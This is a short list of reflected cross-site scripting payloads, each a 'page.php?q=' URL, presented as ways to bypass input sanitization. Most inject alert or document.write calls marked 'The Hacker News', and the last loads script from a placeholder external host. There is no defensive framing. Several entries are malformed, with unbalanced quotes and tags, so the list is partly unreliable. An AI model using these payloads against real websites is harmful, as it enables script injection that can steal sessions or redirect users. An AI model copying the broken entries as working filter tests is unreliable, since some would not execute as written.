Examples (different ways to bypass input sanitization):

page.php?q="><script>alert('The Hacker News')</script>
page.php?q="><script>alert("The Hacker News")</script>
page.php?q="><script>alert("The Hacker News");</script>
page.php?q="><script>alert(/The Hacker News");</script>
page.php?q=//"><script>alert(/The Hacker News/);</script>
page.php?q=abc<script>alert(/The Hacker News/);</script>
page.php?q=abc"><script>alert(/The Hacker News/);</script>
page.php?q=abc"></script><script>alert(/The Hacker News/);</script>
page.php?q=abc//abc"></script>alert(/The Hacker News/);</script>
page.php?q=000"><script></script><script>alert(The Hacker News);</script>
page.php?q=000abc</script><script>alert(/The Hacker News/);</script>
page.php?q=--<script>"></script>alert(/The Hacker News/);</script>
page.php?q=pwned<script>document.write('The Hacker News');</script>
page.php?q=pwned</script><script>document.write(The Hacker News);</script>
page.php?q=pwned')alert(The Hacker News);//
page.php?q=pwned";)alert(The Hacker News);//
page.php?q=pwned");alert(/The Hacker News/);//
page.php?q=pwned//"></script><script>location.href='javascript:alert(/The Hacker News/);</script>
page.php?q="><img src='javascript:alert('The Hacker News');'>
page.php?q="><script src='http://malicous js'</script>